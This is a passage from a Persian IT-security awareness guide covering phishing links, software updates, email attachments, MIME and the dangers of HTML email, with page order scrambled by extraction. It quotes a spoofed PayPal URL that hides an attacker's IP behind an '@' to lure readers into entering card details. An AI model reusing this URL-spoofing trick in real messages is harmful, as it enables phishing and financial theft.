‫ﺷﻤﺎ ﺁﺩﺭﺱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺧﻮﺍﻫﺪ ﺩﺍﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺁﻥ ﻫﻴﭻ ﺍﺭﺗﺒـﺎﻁ ﺻـﻔﺤﻪ‬
‫ﻭﺏ‪ ٦٣‬ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﺻــﻔﺤﺎﺕ ﻭﺏ ﻣﻘــﺼﺪ ﺷــﺎﻣﻞ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫـﻴﭻ ﻛﻼﻫﺒـﺮﺩﺍﺭ ﻳـﺎ ﻫﺮﺯﻧﺎﻣـﻪﻧﻮﻳـﺴﻲ‬
‫ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺷﺘﻪﺑﺎﺷـﺪ‪ .‬ﺍﮔـﺮ ﺑـﺎﺯﻫﻢ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ‬
‫ﺗﺮﺩﻳﺪ ﺩﺍﺷﺘﻴﺪ‪ ،‬ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺗﻠﻔﻦ )ﻭ ﻧﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ( ﺑﺎ ﺷﺮﻛﺖ ﻣﺮﺑﻮﻃﻪ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺍﺯ‬
‫ﺍﺻﺎﻟﺖ ﻧﺎﻣﺔ ﺍﺭﺳﺎﻟﻲ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ‪.‬‬
‫‪http://www.paypal.com:user=3245329:transaction‬‬
‫‪=43293:[email protected]‬‬
‫‪Non-Resident Malware‬‬
‫‪62‬‬
‫‪Hyperlink‬‬
‫‪63‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﻣﺎﻧﺪﮔﺎﺭ‬
‫‪٦٢‬‬
‫ﺍﮔﺮ ﻓﺮﺩﻱ ﺑﺎ ﺭﻳﺰﻩﻛﺎﺭﻳﻬـﺎﻱ ﻗﺎﻟـﺐ ‪ URL‬ﺁﺷـﻨﺎ ﻧﺒﺎﺷـﺪ ﺗـﺼﻮﺭ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻫﻤﺎﻥ ‪ www.paypal.com‬ﺍﺳـﺖ ﻭ‬
‫ﻟﺬﺍ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻧﺒﺎﻳـﺪ ﻛﺎﺭﺍﻛﺘﺮﻫـﺎﻳﻲ‬
‫ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻋﻼﻣﺖ @ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ؛ ﺯﻳﺮﺍ ﺍﻳﻦ‬
‫ﻻ‬
‫‪ URL‬ﺑﻪ ﺁﺩﺭﺱ ‪ 218.5.79.162‬ﻣﺘﺼﻞ ﻣﻲ ﺷـﻮﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺭ ﺍﻳــﻦ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻴــﺰ ﺻــﻔﺤﻪﺍﻱ ﻣــﺸﺎﺑﻪ ﺻــﻔﺤﺔ ﻭﺍﻗﻌــﻲ‬
‫‪ PayPal‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻭ ﺍﺯ ﺷـﻤﺎ ﻣـﻲﺧﻮﺍﻫـﺪ ﻛـﻪ ﻭﺍﺭﺩ ﺁﻥ‬
‫ﺷﻮﻳﺪ ﻭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭﻭﺍﻗﻊ ﺍﻳـﻦ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﺮﮔﺰ ﺑﻪ ‪ PayPal‬ﻣﺘﺼﻞ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜـﻪ ﻣﺘﻌﻠـﻖ‬
‫ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺳﻌﻲ ﺩﺍﺭﺩ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪ .‬ﺍﻳـﻦ ﺣﻴﻠـﻪﻫـﺎ ﺩﺭ ﻋﻤـﻞ ﺑـﺴﻴﺎﺭ‬
‫ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴـﺰ ﺑـﻮﺩﻩﺍﻧـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺸﺎﺑﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﻟﻢ ﻭ ﻣﺸﺮﻭﻉ ﺑﺎﺷﻨﺪ‬
‫ﻛﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻃﺮﻑ ‪ PayPal‬ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫‪٧٩‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺳﻴﺮ ﺗﻜﺎﻣﻞ‬
‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻭﺏ ﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻠﻜﺮﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺭﺍ ﺑﻄـﻮﺭ ﺟﺰﺋـﻲ ﺗﻮﺿـﻴﺢ‬
‫ﻣﻲﺩﻫﻴﻢ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺁﻧﻬﺎ ﻛـﻪ ﺑﺎﻋـﺚ ﺍﻳﺠـﺎﺩ ﻧـﺎﺍﻣﻨﻲ‬
‫ﻣﻲﮔﺮﺩﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻴﻢ‪ .‬ﻣﻮﺍﺭﺩﻱ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ‪،‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺯ ﺩﻳﮕﺮ ﻣﻮﺿـﻮﻋﺎﺕ‬
‫ﺣﺴﺎﺱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬﺎ‬
‫ﭘﺮﺩﺍﺧﺘﻪ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﺻﻮﻝ ﺍﻭﻟﻴﻪ‬
‫ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺑـﺮﺍﻱ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺧﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﺎ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻪ ﺷـﻤﺎ ﺁﺳـﻴﺐ ﺑﺮﺳـﺎﻧﻨﺪ‪ ،‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺷﻤﺎ ﺍﺷـﻜﺎﻝ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻧـﺪ‬
‫ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺭﻭﺷﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻃﺮﺍﺣـﻲ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﻣﻌﻨﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﻪﻫﺎ ﻧﻴﺴﺖ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎ ﻭ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ‪ ،‬ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻧﺴﺨﻪﻫـﺎﻱ‬
‫ﺭﺍﻳﺞ ﺭﺍ ﺑﺮﻃﺮﻑ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺩﺭ‬
‫ﻻ ﻓﻘــﻂ ﺑــﺮﺍﻱ ﺁﺧــﺮﻳﻦ‬
‫ﻣــﻮﺭﺩ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳﮕــﺎﻥ ﻣﻌﻤــﻮ ﹰ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺻﺎﺩﻕ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑـﺪﺍﻥ ﻣﻌﻨﺎﺳـﺖ ﻛـﻪ ﺍﮔـﺮ‬
‫ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺍﺷﻜﺎﻻﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻤﺎﻧﻴﺪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣـﻨﻈﻢ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﻣﻮﺟﻮﺩ ﺁﻥ ﺍﺭﺗﻘﺎ ﺩﻫﻴﺪ‪.‬‬
‫ﻣﺸﻜﻞ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻭﻟﻴﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ‬
‫ﻣﺘﻨﻬﺎﻱ ﺳﺎﺩﻩ‪ ٦٤‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭼﻮﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﺘﻦ ﺧﻮﺩ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﻏﻴﺮﭼﺎﭘﻲ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺩﺭ ﻣﺘﻮﻥ‬
‫ﺳﺎﺩﻩ ﻗﺎﺑﻞ ﻧﻤﺎﻳﺶ ﻧﺒﻮﺩﻧـﺪ‪ .‬ﺭﺍﻩﺣـﻞ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﺑـﻮﺩ ﻛـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﭼﺎﭘﻲ ﺑﮕﻮﻧﻪﺍﻱ ﻛﺪﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺩﺭ ﻣﺘﻮﻥ ﺳﺎﺩﻩ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﺩ )ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﻛﺪﮔـﺬﺍﺭﻱ‬
‫ﺩﺭ ﺿﻤﻴﻤﺔ ‪ ۱‬ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ(‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺑﻌـﺪ ﺍﺯ ﺩﺭﻳﺎﻓـﺖ ﭘﻴـﺎﻡ‪،‬‬
‫ﻓﺎﻳﻞ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺪﮔﺸﺎﻳﻲ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ‬
‫ﺩﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﻔﻬﻮﻡ "ﺿﻤﻴﻤﻪ" ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﺗﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ‬
‫ﺵ‬
‫ﺍﻧﻮﺍﻉ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻛﺪﮔﺬﺍﺭﻱ ﻧﻤـﻮﺩ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﻳـﻦ ﺭﻭ ﹺ‬
‫ﺟﺪﻳﺪ ‪ ٦٥MIME‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻛـﺎﺭﺑﺮﺩ ﺿـﻤﻴﻤﻪ‬
‫ﻭﺳﻌﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻃﻮﺭﻱ‬
‫ﺗﻐﻴﻴﺮ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﺑـﺎﺯ ﻛﻨﻨـﺪ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﺓ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﻧﭽﻪ ﺑﺮﺍﻱ ﻭﻱ ﻓﺮﺳﺘﺎﺩﻩ‬
‫ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﺿﺎﻓﻪ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻥ ﺷﺒﻜﻪ ﮔـﺴﺘﺮﺩﻩ ﺟﻬـﺎﻧﻲ ﻧﻴـﺰ ﻣﺮﺳـﻮﻡ ﺷـﺪ ﻭ ﺍﺯ‬
‫‪ HTML‬ﺑﺮﺍﻱ ﻗﺎﻟﺐﺑﻨﺪﻱ ﺻﻔﺤﺎﺕ ﻭﺏ ﺑﻬﺮﻩ ﮔﺮﻓـﺖ‪HTML .‬‬
‫ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ‪ MIME‬ﺷﺪ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬
‫ﻗﺎﻟﺐﺑﻨﺪﻱ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﺮﺩ )ﺗﻐﻴﻴﺮ ﻓﻮﻧﺖﻫﺎ‪،‬‬
‫ﺭﻧﮕﻬــﺎ‪ ،‬ﺗــﺼﺎﻭﻳﺮ‪ ،‬ﻭ ﺍﺷــﺎﺭﻩﮔﺮﻫــﺎ ﺑــﻪ ﺻــﻔﺤﺎﺕ ﻭﺏ(‪ .‬ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ‬
‫‪Clear Text‬‬
‫‪Multipurpose Internet Mail Extensions‬‬
‫‪64‬‬
‫‪65‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﮔﺮ ﺗﺎﺭﻳﺨﭽﺔ ﺷـﺒﻜﻪ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ )‪ ۱۰‬ﺗـﺎ ‪ ۳۰‬ﺳـﺎﻝ ﮔﺬﺷـﺘﻪ(‬
‫ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ‬
‫ﺍﺭﺳﺎﻝ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺘﻨﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ‪ .‬ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ‬
‫ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻠﻬﺎ ﺑﻬﺮﻩ ﻣﻲﮔﺮﻓﺘﻨﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ ﺗﺎ ﺣﺪﻭﺩﻱ‬
‫ﻧﺎﻣﺄﻧﻮﺱ ﺑﻮﺩﻧﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺳﺨﺖ ﺑﻮﺩ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﻛﺎﺭ‬
‫ﻛﻪ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﺎﻭﺭﻱ ﺑﻮﺩﻧﺪ‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪﺍﻥ ﻣﻬـﻢ ﻧﺒـﻮﺩ‪ ،‬ﺍﻣـﺎ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ‬
‫ﻋﻤﻮﻡ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ‪ ،‬ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺗﻮﺳـﻂ ﻋﻤـﻮﻡ‬
‫ﺳﺎﺩﻩﺗﺮ ﻣﻲﮔﺸﺖ‪.‬‬
‫‪٨٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺩﺳـﺘﻮﺭﺍﺕ‬
‫‪ HTML‬ﺩﺭﻭﻥ ﺻﻔﺤﺎﺕ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺗﺄﺛﻴﺮ ﺍﺭﺗﻘﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﺍﻓﺰﻭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﻟـﺐﺑﻨـﺪﻱ( ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺭﺍ ﻣﻔﻴﺪﺗﺮ ﺳﺎﺧﺖ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺁﻥ‬
‫ﭘﺲ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺴﺎﺩﮔﻲ ﺗﺒﺎﺩﻝ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﻓﻮﻧﺖﻫﺎ‪ ،‬ﺭﻧﮕﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ‪ ،‬ﻧﺎﻣـﻪ ﺷـﻜﻞ ﻣﻄﻠـﻮﺏﺗـﺮﻱ ﭘﻴـﺪﺍ‬
‫ﻣﻲﻛﺮﺩ ﻭ ﻗﺎﻟﺐ ﺑﻨﺪﻱ ﺳﺎﺩﺓ ﺁﻥ ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﭘﺮﺩﺍﺯﺷـﮕﺮ‬
‫ﻛﻠﻤﺎﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﻓﺖ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ‪ ،‬ﺍﻳﻦ ﺍﺭﺗﻘﺎ ﺍﺑﻌﺎﺩ ﻣﻨﻔـﻲ‬
‫ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺷﺖ‪.‬‬
‫ﻼ ﺫﻛﺮ ﺷﺪ ﺗﺎ ﻗﺒﻞ ﺍﺯ ﺍﻳﺠﺎﺩ ﺍﻳﻦ ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺴﻲ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻗﺒ ﹰ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤـﺖ ﺗـﺄﺛﻴﺮ ﻣـﺴﺘﻘﻴﻢ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ‬
‫ﻛﺮﻣﻬﺎ ﻗﺮﺍﺭ ﻧﻤﻲﮔﺮﻓﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﺷﺪﺓ‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺿﻤﺎﺋﻢ ﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﺍﺟﺮﺍ ﻧﻤﻲﻛﺮﺩﻳـﺪ ﺍﺯ ﺧﻄـﺮﺍﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻮﺩﻳـﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﺍﻣـﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﻳﺎﻓـﺖ‬
‫ﻣﻲﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ ﻛـﻪ ﻣﻔﻬـﻮﻡ‬
‫ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺧﻮﺍﻫﻨـﺪ ﺗﻮﺍﻧـﺴﺖ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻫـﺪﺍﻳﺖ ﻛﻨﻨـﺪ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻋﻤـﺎﻝ ﻣﺨﺮﺑـﻲ ﻣﺜـﻞ‬
‫‪ download‬ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ‬
‫ﺍﻳﻦ‪ ،‬ﺩﺳﺘﻮﺭﺍﺕ ﻭﻳﮋﺓ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻣﻬـﺎﺟﻢ ﺭﺍ ﺑـﻪ ﺭﺍﻫﺒـﺮ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺗﺒﺪﻳﻞ ﻛﻨﻨـﺪ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﭼﮕـﻮﻧﮕﻲ ﺁﻥ ﺑـﺴﺘﮕﻲ ﺑـﻪ‬
